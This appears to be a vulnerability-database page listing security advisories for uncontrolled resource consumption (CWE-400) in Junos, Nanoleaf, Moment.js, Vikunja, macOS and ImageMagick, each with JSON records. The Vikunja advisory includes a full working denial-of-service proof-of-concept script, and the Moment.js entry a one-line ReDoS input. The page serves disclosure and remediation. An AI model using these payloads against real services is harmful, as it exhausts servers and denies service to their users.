Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5417 vulnerabilities reference this CWE, most recent first.

GHSA-WC46-55V6-3W8C

Vulnerability from github – Published: 2022-05-13 01:35 – Updated: 2022-05-13 01:35
VLAI
Details

A vulnerability in the Routing Protocols Daemon (RPD) with Juniper Extension Toolkit (JET) support can allow a network based unauthenticated attacker to cause a severe memory exhaustion condition on the device. This can have an adverse impact on the system performance and availability. This issue only affects devices with JET support running Junos OS 17.2R1 and subsequent releases. Other versions of Junos OS are unaffected by this vulnerability. Affected releases are Juniper Networks Junos OS: 17.2 versions prior to 17.2R1-S7, 17.2R2-S6, 17.2R3; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R2-S4, 17.3R3; 17.4 versions prior to 17.4R1-S5, 17.4R2; 18.1 versions prior to 18.1R2-S3, 18.1R3;

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0048"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-10T18:29:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the Routing Protocols Daemon (RPD) with Juniper Extension Toolkit (JET) support can allow a network based unauthenticated attacker to cause a severe memory exhaustion condition on the device. This can have an adverse impact on the system performance and availability. This issue only affects devices with JET support running Junos OS 17.2R1 and subsequent releases. Other versions of Junos OS are unaffected by this vulnerability. Affected releases are Juniper Networks Junos OS: 17.2 versions prior to 17.2R1-S7, 17.2R2-S6, 17.2R3; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R2-S4, 17.3R3; 17.4 versions prior to 17.4R1-S5, 17.4R2; 18.1 versions prior to 18.1R2-S3, 18.1R3;",
  "id": "GHSA-wc46-55v6-3w8c",
  "modified": "2022-05-13T01:35:56Z",
  "published": "2022-05-13T01:35:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0048"
    },
    {
      "type": "WEB",
      "url": "https://kb.juniper.net/JSA10882"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105564"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041849"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WC4V-G2H6-XH3H

Vulnerability from github – Published: 2026-03-25 15:31 – Updated: 2026-03-25 18:31
VLAI
Details

Nanoleaf Lines 12.3.2 does not authenticate firmware file uploads. A remote, unauthenticated attacker can upload firmware files on the device and consume storage resources. Fixed in 12.3.6.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-33268"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T15:16:48Z",
    "severity": "MODERATE"
  },
  "details": "Nanoleaf Lines 12.3.2 does not authenticate firmware file uploads. A remote, unauthenticated attacker can upload firmware files on the device and consume storage resources. Fixed in 12.3.6.",
  "id": "GHSA-wc4v-g2h6-xh3h",
  "modified": "2026-03-25T18:31:46Z",
  "published": "2026-03-25T15:31:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33268"
    },
    {
      "type": "WEB",
      "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-084-01.json"
    },
    {
      "type": "WEB",
      "url": "https://support.nanoleaf.me/hc/en-us/articles/45269445987092-Products-Firmware-Release-Notes-2026"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-33268"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-WC69-RHJR-HC9G

Vulnerability from github – Published: 2022-07-06 18:38 – Updated: 2025-11-04 16:38
VLAI
Summary
Moment.js vulnerable to Inefficient Regular Expression Complexity
Details

Impact

  • using string-to-date parsing in moment (more specifically rfc2822 parsing, which is tried by default) has quadratic (N^2) complexity on specific inputs
  • noticeable slowdown is observed with inputs above 10k characters
  • users who pass user-provided strings without sanity length checks to moment constructor are vulnerable to (Re)DoS attacks

Patches

The problem is patched in 2.29.4, the patch can be applied to all affected versions with minimal tweaking.

Workarounds

In general, given the proliferation of ReDoS attacks, it makes sense to limit the length of the user input to something sane, like 200 characters or less. I haven't seen legitimate cases of date-time strings longer than that, so all moment users who do pass a user-originating string to constructor are encouraged to apply such a rudimentary filter, that would help with this but also most future ReDoS vulnerabilities.

References

There is an excellent writeup of the issue here: https://github.com/moment/moment/pull/6015#issuecomment-1152961973=

Details

The issue is rooted in the code that removes legacy comments (stuff inside parenthesis) from strings during rfc2822 parsing. moment("(".repeat(500000)) will take a few minutes to process, which is unacceptable.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "moment"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.18.0"
            },
            {
              "fixed": "2.29.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Moment.js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.18.0"
            },
            {
              "fixed": "2.29.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-31129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-06T18:38:49Z",
    "nvd_published_at": "2022-07-06T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\n* using string-to-date parsing in moment (more specifically rfc2822 parsing, which is tried by default) has quadratic (N^2) complexity on specific inputs\n* noticeable slowdown is observed with inputs above 10k characters\n* users who pass user-provided strings without sanity length checks to moment constructor are vulnerable to (Re)DoS attacks\n\n### Patches\nThe problem is patched in 2.29.4, the patch can be applied to all affected versions with minimal tweaking.\n\n### Workarounds\nIn general, given the proliferation of ReDoS attacks, it makes sense to limit the length of the user input to something sane, like 200 characters or less. I haven\u0027t seen legitimate cases of date-time strings longer than that, so all moment users who do pass a user-originating string to constructor are encouraged to apply such a rudimentary filter, that would help with this but also most future ReDoS vulnerabilities.\n\n### References\nThere is an excellent writeup of the issue here: https://github.com/moment/moment/pull/6015#issuecomment-1152961973=\n\n### Details\nThe issue is rooted in the code that removes legacy comments (stuff inside parenthesis) from strings during rfc2822 parsing. `moment(\"(\".repeat(500000))` will take a few minutes to process, which is unacceptable.",
  "id": "GHSA-wc69-rhjr-hc9g",
  "modified": "2025-11-04T16:38:46Z",
  "published": "2022-07-06T18:38:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/moment/moment/security/advisories/GHSA-wc69-rhjr-hc9g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31129"
    },
    {
      "type": "WEB",
      "url": "https://github.com/moment/moment/pull/6015#issuecomment-1152961973"
    },
    {
      "type": "WEB",
      "url": "https://github.com/moment/moment/pull/6015/commits/4bbb9f3ccbe231de40207503f344fe5ce97584f4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/moment/moment/pull/6015/commits/bfd4f2375d5c1a2106246721d693a9611dddfbfe"
    },
    {
      "type": "WEB",
      "url": "https://github.com/moment/moment/pull/6015/commits/dc0d180e90d8a84f7ff13572363330a22b3ea504"
    },
    {
      "type": "WEB",
      "url": "https://github.com/moment/moment/commit/9a3b5894f3d5d602948ac8a02e4ee528a49ca3a3"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20241108-0002"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20221014-0003"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZMX5YHELQVCGKKQVFXIYOTBMN23YYSRO"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IWY24RJA3SBJGA5N4CU4VBPHJPPPJL5O"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZMX5YHELQVCGKKQVFXIYOTBMN23YYSRO"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IWY24RJA3SBJGA5N4CU4VBPHJPPPJL5O"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/f0952b67-f2ff-44a9-a9cd-99e0a87cb633"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/moment/moment"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Moment.js vulnerable to Inefficient Regular Expression Complexity"
}

GHSA-WC83-79HJ-HPMQ

Vulnerability from github – Published: 2026-03-20 20:43 – Updated: 2026-03-25 20:59
VLAI
Summary
Vikunja Affected by DoS via Image Preview Generation
Details

Summary

  • Vulnerability: Unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images.
  • Affected code:
  • Decoding without bounds: task_attachment.go:GetPreview
  • Resizing path: resizeImage
  • Endpoint invoking preview: GetTaskAttachment
  • Impact: First preview generation per attachment can allocate large memory and spend significant CPU; multiple attachments or concurrent requests can degrade or crash the service.
  • CVSS v3.1: 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

Preconditions

  • API running locally (http://localhost:8080).
  • Task attachments enabled: task_attachments_enabled=true in Info.
  • Any authenticated user with write access to a task.

How It Works

  • Preview generation decodes the full image via image.Decode and resizes to a target width. There are no guards on width/height or total pixels. A 10,000×10,000 PNG (~284 KB on disk) expands to ~100M pixels in memory during decode and triggers heavy CPU work in resize.
  • The first preview per attachment and size performs the heavy work; later requests are served from cache keyvalue.Remember.

Run The POC

  • Script:
#!/usr/bin/env bash
set -euo pipefail

BASE_URL="${BASE_URL:-http://localhost:8080}"
USERNAME="${USERNAME:-dosuser}"
EMAIL="${EMAIL:-dosuser@example.com}"
PASSWORD="${PASSWORD:-StrongPass123!}"
PROJECT_TITLE="${PROJECT_TITLE:-poc-dos-preview}"
TASK_TITLE="${TASK_TITLE:-DoS preview test}"
OUT_DIR="${OUT_DIR:-/tmp/vikunja-poc-dos}"

mkdir -p "$OUT_DIR"

echo "[+] Checking instance info"
curl -sS "$BASE_URL/api/v1/info" | tee "$OUT_DIR/info.json" >/dev/null
if ! grep -q '"task_attachments_enabled":true' "$OUT_DIR/info.json"; then
  echo "[!] Task attachments disabled"
  exit 1
fi

echo "[+] Registering user (may already exist)"
curl -sS -X POST "$BASE_URL/api/v1/register" \
  -H 'Content-Type: application/json' \
  -d '{"username":"'"$USERNAME"'","email":"'"$EMAIL"'","password":"'"$PASSWORD"'","language":"en"}' \
  | tee "$OUT_DIR/register.json" >/dev/null || true

echo "[+] Logging in"
curl -sS -X POST "$BASE_URL/api/v1/login" \
  -H 'Content-Type: application/json' \
  -d '{"username":"'"$USERNAME"'","password":"'"$PASSWORD"'"}' \
  | tee "$OUT_DIR/login.json" >/dev/null
TOKEN="$(sed -n 's/.*"token"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$OUT_DIR/login.json")"
if [ -z "$TOKEN" ]; then
  echo "[!] Failed to get token"
  exit 1
fi

echo "[+] Creating project"
curl -sS -X PUT "$BASE_URL/api/v1/projects" \
  -H 'Content-Type: application/json' \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"title":"'"$PROJECT_TITLE"'"}' \
  | tee "$OUT_DIR/project.json" >/dev/null
PROJECT_ID="$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))["id"])' "$OUT_DIR/project.json")"
if [ -z "$PROJECT_ID" ]; then
  echo "[!] Failed to get project id"
  exit 1
fi

echo "[+] Creating task"
curl -sS -X PUT "$BASE_URL/api/v1/projects/$PROJECT_ID/tasks" \
  -H 'Content-Type: application/json' \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"title":"'"$TASK_TITLE"'"}' \
  | tee "$OUT_DIR/task.json" >/dev/null
TASK_ID="$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))["id"])' "$OUT_DIR/task.json")"
if [ -z "$TASK_ID" ]; then
  echo "[!] Failed to get task id"
  exit 1
fi

echo "[+] Generating 10000x10000 PNG payload"
python3 - <<'PY'
from PIL import Image
img = Image.new('RGB', (10000,10000), color=(0,0,0))
img.save('/tmp/vikunja-poc-dos/huge.png', optimize=True)
PY
file "$OUT_DIR/huge.png" || true
ls -lh "$OUT_DIR/huge.png" || true

echo "[+] Uploading attachment"
curl -sS -X PUT "$BASE_URL/api/v1/tasks/$TASK_ID/attachments" \
  -H "Authorization: Bearer $TOKEN" \
  -F "files=@$OUT_DIR/huge.png" \
  | tee "$OUT_DIR/attach.json" >/dev/null
ATTACHMENT_ID="$(python3 -c 'import json,sys; d=json.load(open(sys.argv[1])); print(d["success"][0]["id"])' "$OUT_DIR/attach.json")"
if [ -z "$ATTACHMENT_ID" ]; then
  echo "[!] Failed to get attachment id"
  exit 1
fi

echo "[+] Requesting preview (xl)"
/usr/bin/time -l curl -sS -o "$OUT_DIR/preview_xl.png" \
  "$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl" \
  -H "Authorization: Bearer $TOKEN" 2> "$OUT_DIR/time_xl.txt"
du -h "$OUT_DIR/preview_xl.png" || true
file "$OUT_DIR/preview_xl.png" || true
echo "[+] Timing and memory (from /usr/bin/time):"
cat "$OUT_DIR/time_xl.txt" || true

echo "[+] Parallel preview requests (cache warm) x10"
seq 1 10 | xargs -P 5 -I{} sh -c "curl -s -w '%{time_total}\n' -o /dev/null \
  '$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl' \
  -H 'Authorization: Bearer $TOKEN'" | tee "$OUT_DIR/parallel_times.txt" >/dev/null
echo "[+] Done. Outputs in $OUT_DIR"

  • Uses curl and python3 (Pillow) to generate a 10k×10k PNG, upload it, and request an xl preview while recording timing and memory metrics.

Steps

  1. Ensure the API is running on http://localhost:8080.
  2. Execute: bash pocs/image-preview-dos/poc.sh
  3. Outputs of interest:
  4. /tmp/vikunja-poc-dos/time_xl.txt: /usr/bin/time -l timing and memory for the preview request.
  5. /tmp/vikunja-poc-dos/parallel_times.txt: 10 parallel preview times with cache warmed.
  6. /tmp/vikunja-poc-dos/preview_xl.png: Generated 800×800 preview.

Environment Overrides

  • BASE_URL: API base (default http://localhost:8080)
  • USERNAME, EMAIL, PASSWORD: credentials for the test user
  • PROJECT_TITLE, TASK_TITLE: names for test artifacts
  • OUT_DIR: output directory (default /tmp/vikunja-poc-dos)

Expected Results

  • First preview request shows higher latency and memory footprint, demonstrating server-side decode and resize of a 10k×10k image.
  • Subsequent requests are faster due to caching.
  • Parallel requests across multiple unique attachments reproduce the heavy work and can degrade the API.

Remediation

  • Enforce bounds prior to decode:
  • Reject images exceeding max width/height (e.g., 8000×8000) or max total pixels (e.g., 20M).
  • Fail early by reading headers to extract dimensions before full decode.
  • Add per-user and per-attachment rate limiting for preview generation.
  • Pre-generate previews asynchronously with throttling and backpressure.
  • Keep caching, but consider configurable cache eviction strategy to avoid repeated heavy work.

Notes

  • This POC uses a solid-color PNG to produce large dimensions with small file size. Other formats and images with extreme dimensions can be substituted.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0-rc0"
            },
            {
              "fixed": "2.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33474"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:43:11Z",
    "nvd_published_at": "2026-03-24T16:16:33Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n- Vulnerability: Unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images.\n- Affected code:\n  - Decoding without bounds: [task_attachment.go:GetPreview](../../tree/main/pkg/models/task_attachment.go#L219-L229)\n  - Resizing path: [resizeImage](../../tree/main/pkg/models/task_attachment.go#L293-L304)\n  - Endpoint invoking preview: [GetTaskAttachment](../../tree/main/pkg/routes/api/v1/task_attachment.go#L195-L203)\n- Impact: First preview generation per attachment can allocate large memory and spend significant CPU; multiple attachments or concurrent requests can degrade or crash the service.\n- CVSS v3.1: 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Preconditions\n- API running locally (`http://localhost:8080`).\n- Task attachments enabled: `task_attachments_enabled=true` in [Info](../../tree/main/pkg/routes/api/v1/info.go#L82-L160).\n- Any authenticated user with write access to a task.\n\n## How It Works\n- Preview generation decodes the full image via `image.Decode` and resizes to a target width. There are no guards on width/height or total pixels. A 10,000\u00d710,000 PNG (~284 KB on disk) expands to ~100M pixels in memory during decode and triggers heavy CPU work in resize.\n- The first preview per attachment and size performs the heavy work; later requests are served from cache [keyvalue.Remember](../../tree/main/pkg/models/task_attachment.go#L220-L244).\n\n## Run The POC\n- Script: \n```sh\n#!/usr/bin/env bash\nset -euo pipefail\n\nBASE_URL=\"${BASE_URL:-http://localhost:8080}\"\nUSERNAME=\"${USERNAME:-dosuser}\"\nEMAIL=\"${EMAIL:-dosuser@example.com}\"\nPASSWORD=\"${PASSWORD:-StrongPass123!}\"\nPROJECT_TITLE=\"${PROJECT_TITLE:-poc-dos-preview}\"\nTASK_TITLE=\"${TASK_TITLE:-DoS preview test}\"\nOUT_DIR=\"${OUT_DIR:-/tmp/vikunja-poc-dos}\"\n\nmkdir -p \"$OUT_DIR\"\n\necho \"[+] Checking instance info\"\ncurl -sS \"$BASE_URL/api/v1/info\" | tee \"$OUT_DIR/info.json\" \u003e/dev/null\nif ! grep -q \u0027\"task_attachments_enabled\":true\u0027 \"$OUT_DIR/info.json\"; then\n  echo \"[!] Task attachments disabled\"\n  exit 1\nfi\n\necho \"[+] Registering user (may already exist)\"\ncurl -sS -X POST \"$BASE_URL/api/v1/register\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"\u0027\"$USERNAME\"\u0027\",\"email\":\"\u0027\"$EMAIL\"\u0027\",\"password\":\"\u0027\"$PASSWORD\"\u0027\",\"language\":\"en\"}\u0027 \\\n  | tee \"$OUT_DIR/register.json\" \u003e/dev/null || true\n\necho \"[+] Logging in\"\ncurl -sS -X POST \"$BASE_URL/api/v1/login\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"\u0027\"$USERNAME\"\u0027\",\"password\":\"\u0027\"$PASSWORD\"\u0027\"}\u0027 \\\n  | tee \"$OUT_DIR/login.json\" \u003e/dev/null\nTOKEN=\"$(sed -n \u0027s/.*\"token\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p\u0027 \"$OUT_DIR/login.json\")\"\nif [ -z \"$TOKEN\" ]; then\n  echo \"[!] Failed to get token\"\n  exit 1\nfi\n\necho \"[+] Creating project\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/projects\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d \u0027{\"title\":\"\u0027\"$PROJECT_TITLE\"\u0027\"}\u0027 \\\n  | tee \"$OUT_DIR/project.json\" \u003e/dev/null\nPROJECT_ID=\"$(python3 -c \u0027import json,sys; print(json.load(open(sys.argv[1]))[\"id\"])\u0027 \"$OUT_DIR/project.json\")\"\nif [ -z \"$PROJECT_ID\" ]; then\n  echo \"[!] Failed to get project id\"\n  exit 1\nfi\n\necho \"[+] Creating task\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/projects/$PROJECT_ID/tasks\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d \u0027{\"title\":\"\u0027\"$TASK_TITLE\"\u0027\"}\u0027 \\\n  | tee \"$OUT_DIR/task.json\" \u003e/dev/null\nTASK_ID=\"$(python3 -c \u0027import json,sys; print(json.load(open(sys.argv[1]))[\"id\"])\u0027 \"$OUT_DIR/task.json\")\"\nif [ -z \"$TASK_ID\" ]; then\n  echo \"[!] Failed to get task id\"\n  exit 1\nfi\n\necho \"[+] Generating 10000x10000 PNG payload\"\npython3 - \u003c\u003c\u0027PY\u0027\nfrom PIL import Image\nimg = Image.new(\u0027RGB\u0027, (10000,10000), color=(0,0,0))\nimg.save(\u0027/tmp/vikunja-poc-dos/huge.png\u0027, optimize=True)\nPY\nfile \"$OUT_DIR/huge.png\" || true\nls -lh \"$OUT_DIR/huge.png\" || true\n\necho \"[+] Uploading attachment\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/tasks/$TASK_ID/attachments\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -F \"files=@$OUT_DIR/huge.png\" \\\n  | tee \"$OUT_DIR/attach.json\" \u003e/dev/null\nATTACHMENT_ID=\"$(python3 -c \u0027import json,sys; d=json.load(open(sys.argv[1])); print(d[\"success\"][0][\"id\"])\u0027 \"$OUT_DIR/attach.json\")\"\nif [ -z \"$ATTACHMENT_ID\" ]; then\n  echo \"[!] Failed to get attachment id\"\n  exit 1\nfi\n\necho \"[+] Requesting preview (xl)\"\n/usr/bin/time -l curl -sS -o \"$OUT_DIR/preview_xl.png\" \\\n  \"$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl\" \\\n  -H \"Authorization: Bearer $TOKEN\" 2\u003e \"$OUT_DIR/time_xl.txt\"\ndu -h \"$OUT_DIR/preview_xl.png\" || true\nfile \"$OUT_DIR/preview_xl.png\" || true\necho \"[+] Timing and memory (from /usr/bin/time):\"\ncat \"$OUT_DIR/time_xl.txt\" || true\n\necho \"[+] Parallel preview requests (cache warm) x10\"\nseq 1 10 | xargs -P 5 -I{} sh -c \"curl -s -w \u0027%{time_total}\\n\u0027 -o /dev/null \\\n  \u0027$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl\u0027 \\\n  -H \u0027Authorization: Bearer $TOKEN\u0027\" | tee \"$OUT_DIR/parallel_times.txt\" \u003e/dev/null\necho \"[+] Done. Outputs in $OUT_DIR\"\n\n```\n- Uses `curl` and `python3` (Pillow) to generate a 10k\u00d710k PNG, upload it, and request an xl preview while recording timing and memory metrics.\n\n### Steps\n1. Ensure the API is running on `http://localhost:8080`.\n2. Execute:\n   ```\n   bash pocs/image-preview-dos/poc.sh\n   ```\n3. Outputs of interest:\n   - `/tmp/vikunja-poc-dos/time_xl.txt`: `/usr/bin/time -l` timing and memory for the preview request.\n   - `/tmp/vikunja-poc-dos/parallel_times.txt`: 10 parallel preview times with cache warmed.\n   - `/tmp/vikunja-poc-dos/preview_xl.png`: Generated 800\u00d7800 preview.\n\n### Environment Overrides\n- BASE_URL: API base (default `http://localhost:8080`)\n- USERNAME, EMAIL, PASSWORD: credentials for the test user\n- PROJECT_TITLE, TASK_TITLE: names for test artifacts\n- OUT_DIR: output directory (default `/tmp/vikunja-poc-dos`)\n\n## Expected Results\n- First preview request shows higher latency and memory footprint, demonstrating server-side decode and resize of a 10k\u00d710k image.\n- Subsequent requests are faster due to caching.\n- Parallel requests across multiple unique attachments reproduce the heavy work and can degrade the API.\n\n## Remediation\n- Enforce bounds prior to decode:\n  - Reject images exceeding max width/height (e.g., 8000\u00d78000) or max total pixels (e.g., 20M).\n  - Fail early by reading headers to extract dimensions before full decode.\n- Add per-user and per-attachment rate limiting for preview generation.\n- Pre-generate previews asynchronously with throttling and backpressure.\n- Keep caching, but consider configurable cache eviction strategy to avoid repeated heavy work.\n\n## Notes\n- This POC uses a solid-color PNG to produce large dimensions with small file size. Other formats and images with extreme dimensions can be substituted.",
  "id": "GHSA-wc83-79hj-hpmq",
  "modified": "2026-03-25T20:59:27Z",
  "published": "2026-03-20T20:43:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-wc83-79hj-hpmq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33474"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja Affected by DoS via Image Preview Generation"
}

GHSA-WC8G-QPV4-8J46

Vulnerability from github – Published: 2024-09-17 00:31 – Updated: 2025-11-04 18:31
VLAI
Details

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.7, macOS Sequoia 15. Processing a maliciously crafted video file may lead to unexpected app termination.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-40841"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-17T00:15:48Z",
    "severity": "HIGH"
  },
  "details": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.7, macOS Sequoia 15. Processing a maliciously crafted video file may lead to unexpected app termination.",
  "id": "GHSA-wc8g-qpv4-8j46",
  "modified": "2025-11-04T18:31:19Z",
  "published": "2024-09-17T00:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40841"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/121238"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/121247"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Sep/33"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Sep/40"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCC4-H459-J83C

Vulnerability from github – Published: 2022-05-17 02:24 – Updated: 2022-05-17 02:24
VLAI
Details

The ReadEPTImage function in coders/ept.c in ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1 allows remote attackers to cause a denial of service (memory consumption) via a crafted file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-11530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-23T03:29:00Z",
    "severity": "HIGH"
  },
  "details": "The ReadEPTImage function in coders/ept.c in ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1 allows remote attackers to cause a denial of service (memory consumption) via a crafted file.",
  "id": "GHSA-wcc4-h459-j83c",
  "modified": "2022-05-17T02:24:08Z",
  "published": "2022-05-17T02:24:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11530"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/issues/524"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=867821"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCCQ-3Q4Q-X242

